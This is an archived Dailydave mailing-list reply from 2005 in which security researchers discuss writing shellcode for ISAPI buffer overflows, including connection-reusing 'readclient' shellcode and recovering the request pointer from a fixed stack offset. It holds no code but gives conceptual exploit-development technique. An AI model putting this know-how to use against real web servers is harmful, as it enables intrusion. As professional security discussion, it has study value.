Dailydave mailing list archives
Re: A white-tip shark has a sensitive enough lateral line to hunt the reef in complete darkness
From: Dave Aitel <dave () immunitysec com>
Date: Fri, 07 Jan 2005 13:39:00 -0500
halvar () gmx de wrote:
(The following note is stuff Halvar and a lot of people already know or find too obvious to mention, but not everyone does)Readclient shellcode is the obvious way to go when doing ISAPI. The retrieval of the connection ID is in most cases not a problem -- very few ISAPI's I've seen overflow in a different thread than the one that went through HttpExtensionProc. In that case, unless you're very unlucky, your ESP is still intact, and unless you _really_ smashed the stack (e.g. memcpy(,,-1)) you will have no problem retrieving the lpECB from [ESP+static_offset]. Remember that stack frame sizes are constant for a given executable, and that you can just rely on a value you figured out in your own debugger here. Of yourse, you have to adjust 1 offset in the shellcode to makeit work for different targets.
This is true in some cases, but not in others (heap overflows, even some stack overflows). A good ISAPIcode will handle those cases. It's nice to avoid that extra step, in any case. :>
-dave _______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com https://lists.immunitysec.com/mailman/listinfo/dailydave
Current thread:
- A white-tip shark has a sensitive enough lateral line to hunt the reef in complete darkness Dave Aitel (Jan 06)
- Re: A white-tip shark has a sensitive enough lateral line to hunt the reef in complete darkness Anthony . zboralski (Jan 06)
- Re: A white-tip shark has a sensitive enough lateral line to hunt the reef in complete darkness H D Moore (Jan 06)
- Re: A white-tip shark has a sensitive enough lateral line to hunt the reef in complete darkness halvar (Jan 07)
- Re: A white-tip shark has a sensitive enough lateral line to hunt the reef in complete darkness Dave Aitel (Jan 07)